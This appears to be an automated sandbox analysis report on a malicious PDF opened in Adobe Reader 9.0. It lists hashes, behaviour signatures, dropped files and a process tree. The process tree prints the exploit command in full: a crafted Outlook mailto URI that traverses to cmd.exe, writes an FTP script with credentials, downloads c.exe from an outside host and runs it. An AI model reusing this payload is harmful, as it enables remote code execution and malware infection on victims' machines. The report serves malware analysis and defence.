Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    12-02-2024 15:25

General

  • Target
    977c984367355f590a8bb159f76d94d9.pdf
  • Size
    14KB
  • MD5
    977c984367355f590a8bb159f76d94d9
  • SHA1
    1a1a1c77da9a62caae618745be5e2dac76afe56f
  • SHA256
    25830eecbe144320cf5e74614e967b0f272a4362a801665258ad67c1255bb7d2
  • SHA512
    2af47e7cf4b73ce007253206bf256d2c10d8969202fd04d9c7e83c06c0b4adecc7a4d926536c9b36b10d71eff1eca76ce414f2d0918039595bd4c76796c1b47b
  • SSDEEP
    192:vJs0bjJqccyZxcqXtTJWuZ2yvO9Y+j1MK8kM7kMNzpFh4lMJ:R5pqwttTIs0pCfNTpr4qJ

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 14 IoCs
  • Drops file in Windows directory 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\977c984367355f590a8bb159f76d94d9.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE
      "C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE" -c IPM.Note /m "mailto:test%25../../../../../../../../windows/system32/cmd%22.exe%22%22%20/c%20/q%20%22@echo%20off&echo%20dinozavr_ftp0%3Ed&echo%20sDs1LSWZ%3E%3Ed&echo%20binary%3E%3Ed&echo%20GET%20/i%20c.exe%3E%3Ed&echo%20bye%3E%3Ed&ftp%20-is:d%20cgi18.hqhost.net%3Enul&del%20/q%20d&@start%20c.exe&%22%20%22&%22%20%22nul.bat%22.cmd"
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      PID:2108

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT
    Filesize: 230KB
    MD5: 2592d0de4e35b4cb0091316d3654e491
    SHA1: 31a82f183f4a9668b49189c12ab50382f02c952a
    SHA256: e34318f3ccba08f03adeb8f7ec9d780340d4401d2f8e7ec4d4c81facad5495f1
    SHA512: c8b6f727fe538bca34204111205f2f579b3e55d5490e52ac5a0ed950ae740a178b27693bbd0e5a2ee3b172fdbe3ec1a5468f1e9de0a272dc75a3dc22a132a72e

  • C:\Users\Admin\AppData\Local\Microsoft\Outlook\mapisvc.inf
    Filesize: 1KB
    MD5: 48dd6cae43ce26b992c35799fcd76898
    SHA1: 8e600544df0250da7d634599ce6ee50da11c0355
    SHA256: 7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a
    SHA512: c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize: 3KB
    MD5: 9edff29076fc02b73344ab9c097e8843
    SHA1: 92ac67ab37a22cde2fe960a11d4f85c334139ea7
    SHA256: 08e08eb12cf799633f081ff6b9df8d6dc023448078afb0a6a80607b6d2bed43d
    SHA512: 0ccb3f99f31b3307653904e21e2ad82894433019fb52946d83217af2526d52c5048d484f81caf4cf860632adb5fa712cb3b4cda41da9ea0197d426db64c61bb9

  • memory/2108-2-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize: 64KB

  • memory/2108-3-0x0000000070C2D000-0x0000000070C38000-memory.dmp
    Filesize: 44KB

  • memory/2108-143-0x0000000070C2D000-0x0000000070C38000-memory.dmp
    Filesize: 44KB

  • memory/2956-0-0x0000000002C00000-0x0000000002C76000-memory.dmp
    Filesize: 472KB